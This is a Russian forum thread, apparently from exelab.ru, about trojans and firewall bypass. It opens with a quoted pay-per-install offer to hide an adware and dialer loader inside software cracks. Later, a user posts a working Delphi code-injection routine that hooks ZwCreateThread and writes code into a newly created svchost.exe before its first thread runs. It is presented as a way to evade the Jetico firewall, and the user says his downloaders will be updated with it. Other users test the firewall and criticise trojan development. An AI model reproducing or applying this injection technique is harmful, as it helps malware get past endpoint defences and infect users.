Во мне что по мэйлу пришло:

Предлагаю нам с вами работать вместе, суть заключается в том что мы платим за
инсталлы нашего софта, это делается так вебмастер размещает у себя на сайте
срытый ифрэйм код, когда юзер туда заходит ему сливается на автомате лоадер
который скрытно устанавливает наше по, в него входят тулбар, диалер и смена
хоумпаги. Так вот я предлагаю вам просто интегрировать наш лоадер(ехе файл), в
свои патчи и прочие кряки, он весит всего 4кб, и когда юзер будет запускать
ваш кряк, ему будет ставится наш софт, обычно чтоб не выдавать себя софт
активизируется через 15-30 минут... Теперь самое интересное, для работы с нами
вам необходимо зарегистрироваться на нашем сайте и сообщить об этом мне, чтоб
я вас активизировал... теперь поговорим об оплате, мы платим от 80 до 500
долларов за 1000 инсталов нашего софта.. для более подробной информации вот
мои контактные данные:
ччтп://leonex.iframecash.biz/ (хз, там может быть тоже трой).
icq: 238726537

-----
Всем не угодишь

| Сообщение посчитали полезным:

arnix пишет:
А что им мешает просто джойнером склеить кряк с заразой, тут уже никакая защита не поможет...
Так нет, на сайте тимы в описании кряка его размер и контрольная сумма.

| Сообщение посчитали полезным:

ASMax Gideon Vi Ms-Rem не соррьтесь А то щас будет явный оффтоп. И разведете тему кто круче Как я уже написал при большом желании ломается/обходится всё. Но в стандартных ситуациях частенько спасает фаер подобраный с умом и настроенный как следует.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

fakit
Полагаешь юзвер полезет на сайт тимы чтобы сравнить контрольную сумму кряка найденого на каком нить cracks.am? Емуб побыстрее прогу активировать и насладиться всеми прелестями... В общем пока человек сам не научится на своих ошибках ему никто ничем не поможет! Он как был ботом так и останется им.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX], никто не ссорится Я задал вопрос Ms-Rem, так как его квалификация в данном вопросе явно выше моей.
"50 строк" - это, я так понимаю, чтобы выйти под маской какого-нибудь "правильного" приложения, типа IEXPLORE.EXE... но у того же оутпуста весьма толковый анализатор, так что куча приватных и не очень троев, до недавнего времени удачно юзавших эту возможность, теперь нервно курят. Значит, если не ломать фаер, то можно чувстовать себя в относительной безопасности...

| Сообщение посчитали полезным:

Gideon Vi
Ну есть методы которые и не требуют изменения приложения или его компонентов. Просто нужно немного смекалки и изощерености. Так что если задаться целью затроянить цель, то почти всегда можно этого добится.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX]
я полезу, ты полезешь, еще другой десяток ;) А кто на остальных НАС_рать

| Сообщение посчитали полезным:

Gideon Vi

Вот один из примеров закачки файла в обход фаерволла (в том числе контрольк компонентов идет лесом).
Закачка идет через процесс svchost.exe который в дефолтовых правиилах фаерволлов имеет доступ по 80 порту. Этот метод используется в простеньких довнлоадерах для массовых ботов.
Для установки профессионального spyware используется более прокачаная разновидность этого метода, в которой автоматически определяется имеющий доступ к http процесс, в этом случае идет лесом даже хорошо настроеный фаерволл.
Самые лучшие spyware тулы используют более сложные методы обхода фаерволла (на уровне ядра), которые позволяют работать с сетью так, как будто фаерволла вобще не существует (даже если вся сетевая активность запрещена).

Короче говоря, с учетом всего вышесказаного кряки лучше всего запускать только в VmWare

2103_FireFuck.asm.zip

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
кряки лучше всего запускать только в VmWare
Или из архивов, подписанных электронной подписью.

| Сообщение посчитали полезным:

Эмм... ну раз на то пошло то есть еще одна идея личного характера...
Что мешает троянцу создать файл для отправки на ружу с нужной для нас инфой + html файл закачки на определеный сервачек полезного нам файла и этот html файл выставить домашней страницей. Впринципе никаких нарушений в системен не производим... браузеру скорей всего доступ в инет разрешен... Так что в 80% ведро будет затроянено должным образом. Надеюсь эта инфа не уйдет дальше этого фрума и не проявится в виде новых троянов и прочей фигни

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Ms-Rem пишет:
в которой автоматически определяется имеющий доступ к http процесс, в этом случае идет лесом даже хорошо настроеный фаерволл.
В нормальных файрах есть контроль использования CreateRemoteThread/WriteProcessMemory процессом. Правила из области "Process attack rule". Т.е. внедрение кода в чужой процесс и запуск его контролируется. Имхо, не прокатит.
Ms-Rem пишет:
более сложные методы обхода фаерволла (на уровне ядра)
Если еще и вирусы в ring0 появятся, тогда вооще труба...

| Сообщение посчитали полезным:

[HEX] пишет:
Что мешает троянцу создать файл для отправки на ружу с нужной для нас инфой + html файл закачки на определеный сервачек полезного нам файла
А как этот файл отправить ? Если через форму, то вначале кнопку Submit нажать надо. А javascript вроде отправлять файлы сам не может...

| Сообщение посчитали полезным:

FKMA пишет:
В нормальных файрах есть контроль использования CreateRemoteThread/WriteProcessMemory процессом
Ага, у аутпоста 3.0 написанна такая фигня в фишка, но я не тестил.

| Сообщение посчитали полезным:

[quote]ак что в 80% ведро будет затроянено должным образом. Надеюсь эта инфа не уйдет дальше этого фрума и не проявится в виде новых троянов и прочей фигни[/quote]
Да и незачем такие извращения, все делается гораздо проще.


>> Имхо, не прокатит.

А ты сначала проверь пример из атача. В данном случае фаерволл не может контролировать WriteProcessMemory (это связано с одним из ключевых принципов работы Windows). В общем теорию этого метода я обьяснять не буду, кому надо тот и сам догадается. Единственный фаерволл которые может эту реалиацию отлавливать - это ZoneAlarm, но против него тоже можно использовать этот же метод с небольшими модификациями, естественно их приводить я тоже не буду.
Короче, если кто не верит что это работает, пусть проверит сам.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
А ты сначала проверь пример из атача. В данном случае фаерволл не может контролировать WriteProcessMemory (это связано с одним из ключевых принципов работы Windows).

Jetico Personal Firewall прекрасно отловил попытку
Event: attacker writes to application's memory
Attacker: E:\FASM\2103_FireFuck.exe

Так что не прокатывает пока ;) Можно спать спокойно

| Сообщение посчитали полезным:

Ща поставлю этот фаер и проверю, но не жумай что можно спать спокойно, есть и более серьезные методы обхода.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Горько смотреть когда талантливые люди озабочены разработкой опасных троянов.

-----
Всем не угодишь

| Сообщение посчитали полезным:

>>Jetico Personal Firewall прекрасно отловил попытку

Странно, я сейчас проверил на Jetico Personal Firewall 1.0.1.61, и файл скачался успешно.
Какая у тебя версия фаерволла, и как его нужно настроить чтобы он отлавливал вышеприведенный пример?
Если он действительно его отлавливает (что неудивительно, так как я его полгода назад на паблик выложил), то могу точно сказать что это ненадолго.

Немного теории:
При запуске процесса происходит сначала чоздание его адресного пространства (ZwCreateProcess), затем создание его PEB и заполнение ее начальными значениями (командная строка, переменные окружения и.т.д.), в этом момент родительский процесс ПИШЕТ В ПАМЯТЬ ДОЧЕРНЕГО. После чего создается первый поток процесса (ZwCreateThread) и запускается (ZwResumeThread).
Вышеприведенный пример основан на том, что фаерволлы не контролируют запись в память процесса до момента старта его первого потока (по вышеприведенным причинам). Процесс создается в приостановленом состоянии, в него записывается код и меняется стартовый контекст потока.
Обнаружение этого метода обхода фаерволла возможно путем контроля диапазона адресов памяти по которым происходит запись при создании процесса. Если фаерволлы уже это делают, то мне просто нужно будет записать шелкод в диапазон аресов PEB, и в этом случае просто НЕВОЗМОЖНО 100% достоверно отличить такую атаку от нормального запуска процесса.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Bad_guy пишет:
Горько смотреть когда талантливые люди озабочены разработкой опасных троянов.
Ms-Rem, правда, может не стоит Ms-Rem пишет:
Если он действительно его отлавливает (что неудивительно, так как я его полгода назад на паблик выложил), то могу точно сказать что это ненадолго.
Вирь, собранный из твоих исходников, уже был на этом сайте. А в твоей компетентности никто и не сомневается...

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться

| Сообщение посчитали полезным:

Ms-Rem пишет:
я сейчас проверил на Jetico Personal Firewall 1.0.1.61, и файл скачался успешно.
Версия такая же.
Ms-Rem пишет:
как его нужно настроить чтобы он отлавливал вышеприведенный пример?
Специально настраивать не надо (я не настраивал).
Система WXP SP2.
Ms-Rem пишет:
Если фаерволлы уже это делают, то мне просто нужно будет записать шелкод в диапазон аресов PEB
Джетика хучит ZwWriteVirtualMemory в ServiceDescriptionTable. Возможно она позволяет писать в PEB только в течении вызова ZwCreateProcess, вернее CreateProcess сам туда пишет. А все последующие попытки блокирует. Предполагаю, что если ты попробуешь писать в PEB после возврата из ZwCreateProcess, то все равно она перехватит.

| Сообщение посчитали полезным:

Jetico у меня не ловил этот пример потому, что один из моих драйверов мешал ему хукать SDT.
Он действительно отлавливает этот пример, и я сейчас более подробно исследовал его работу.
Jetico помимо ZwWriteVirtualMemory хукает еще и ZwCreateThread.
Так как запись в память процесса при его создании происходит до создания потока, то после вызова ZwCreateThread начинает работать контроль. После создания первого потока может происходить еще одна запись в PEB (при установке некоторых полей PEB), поэтому после создания, но до запуска потока еще можно записывать в PEB, но не более 20 байт (проверка идет в обработчике хука ZwWriteVirtualMemory драйвера фаерволла).
В общем неплохой метод защиты, но если чуток пораскинуть мозгами, то и эта защита идет лесом, для этого нужно записать в память процесса сразу же после создания адресного пространства и не использовать CreateRemoteThread для запуска кода. Ниже приведен пример инжекта в дочерний процесс который я накатал за 5 минут.

program Project2;

uses
windows, advApiHook, NativeApi;

procedure InjectProc();
asm
@a:
jmp @a
end;
procedure InjectEnd(); asm end;

var
TrueZwCreateThread: function(ThreadHandle: pdword;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: pointer;
ProcessHandle: THandle;
ClientId: PClientID;
ThreadContext: PContext;
UserStack: pointer;
CreateSuspended: boolean):NTStatus;
stdcall;
EpAddr: pointer;

Function NewZwCreateThread(ThreadHandle: pdword;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: pointer;
ProcessHandle: THandle;
ClientId: PClientID;
ThreadContext: PContext;
UserStack: pointer;
CreateSuspended: boolean):NTStatus;
stdcall;
var
Bytes: dword;
InjSize: dword;
begin
InjSize := dword(@InjectEnd) - dword(@InjectProc);
WriteProcessMemory(ProcessHandle, EpAddr, @InjectProc, InjSize, Bytes);
Result := TrueZwCreateThread(ThreadHandle, DesiredAccess, ObjectAttributes,
ProcessHandle, ClientId, ThreadContext,
UserStack, CreateSuspended);
end;

var
si: TStartupInfo;
pi: TProcessInformation;
dHdr: PIMageDosHeader;
nHdr: PImageNtHeaders;

begin
dHdr := pointer(LoadLibraryEx('svchost.exe', 0, DONT_RESOLVE_DLL_REFERENCES));
nHdr := pointer(dword(dHdr) + dHdr^._lfanew);
EpAddr := pointer(nHdr^.OptionalHeader.AddressOfEntryPoint + nHdr^.OptionalHeader.ImageBase);
HookProc('ntdll.dll', 'ZwCreateThread', @NewZwCreateThread, @TrueZwCreateThread);
ZeroMemory(@Si, sizeof(Si));
si.cb := sizeof(si);
CreateProcess(nil, 'svchost.exe', nil, nil, false, 0, nil, nil, si, pi);
end.

Этот пример показывает воможность обхода Jetico. Пока что нет времени довести его до ума, но через пару дней все довнлоадеры будут обновлены с учетом всего вышесказаного.

FKMA - большое тебе спасибо за помощь!

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Этот пример показывает воможность обхода Jetico.
Черт, до безобразия хороший способ Это тебе спасибо за исследование.
Придется теперь разрабам джетики писать, чтоб получше эту проверку реализовали

| Сообщение посчитали полезным:

Вот в продолжение темы (по Асе пришло):

halmer (15:01:43 28/11/2005)
привет. ты знаешь место где программы за бабки ломают? сам не можешь взяться ?


Вот сижу и думаю кто такой halmer и где я Асю засветил

| Сообщение посчитали полезным:

xDriver
Асю ты засветил тут
http://exelab.ru/f/action=userinfo&user=587

...а вообще оффтоп пошёл, тему закрываю.

-----
Всем не угодишь

| Сообщение посчитали полезным: